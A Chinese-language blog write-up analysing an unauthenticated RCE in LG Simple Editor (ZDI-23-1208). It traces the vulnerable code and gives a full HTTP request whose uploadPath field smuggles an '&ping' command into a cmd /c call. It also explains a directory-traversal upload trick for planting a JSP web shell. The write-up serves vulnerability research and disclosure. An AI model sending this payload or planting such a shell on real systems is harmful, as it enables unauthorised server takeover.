LG是一家专门搞LED的公司,旗下有一些产品,这次看的是zdi爆出来的LG Simple Editor,公网数量虽然不多,但是漏洞是未授权RCE。
https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
com.lge.simpleeditor.content.controller.ImageManagerRestController#uploadVideo
漏洞很简单
com.lge.simpleeditor.content.service.CanvasServiceImpl#readVideoInfo 存在拼接
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/58a8c67f-5be1-6971-137e-8751f35724b7.png)
最终cmd使用filePath拼接为
1
| MediaInfo --Inform=General;%Duration% -f "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4" > "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4.ini"
|
用双引号包裹了,然后用cmd /c 启动
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/d7117f31-74ac-1157-fa13-ca78c6d4a46f.png)
那也就是说只要能在cmd变量里逃逸出双引号就行
直接使用双引号闭合发现报错
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5704c91b-5056-2d56-8c54-b5a9e6b06d37.png)
想起来在Windows里不能出现特殊字符串作为文件夹/文件的名字,于是改为\"/../
,通过这种方式闭合双引号之后,再用../
跳级目录,这样就不会出现报错了。
构造请求包如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
Host: 172.16.1.179:8080
Content-Length: 770
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyb6VMLBDGWBAjiJA
Origin: http://172.16.1.179:8080
Referer: http://172.16.1.179:8080/simpleeditor/index.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile"; filename="1.mp4"
Content-Type: video/mp4
1
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadPath"
/sessions\"&ping localhost -nc 1&\..\..\..\
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_x"
-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_y"
-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_width"
1064
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_height"
599
------WebKitFormBoundaryyb6VMLBDGWBAjiJA--
|
注入的命令如下
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/41d16569-f7da-7486-b886-e61ab5898934.png)
弹
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5fb00690-9499-e8db-e1fe-b24bc36f7a54.png)
仔细看了看功能点,发现可以跨目录任意文件上传
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/2bf7f6cc-7ce6-b466-b8fc-a61146c84b29.png)
文件路径由1标的originalFilePath决定,而1标取决于2标的uploadPath和fileName变量,uploadPath在4标从http请求中获取,这里可以跨目录,而fileName在3标中如果文件名中有.
才会判断后缀,那么可以将uploadPath
赋值为/js/1.
,而fileName直接给一个jsp
文件名,这样拼接成一个/js/1.jsp
的originalFilePath路径。
这样就能写一个jsp shell了。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/0bf27705-9ed6-aa02-dd49-fce1e7e08aa0.png)
如图
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fcf67ed6-b705-4e15-cd10-ea8a92772eea.png)
shell路径在
看了zdi爆了一堆这个产品的洞,看了看都是简单洞,没必要写了。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。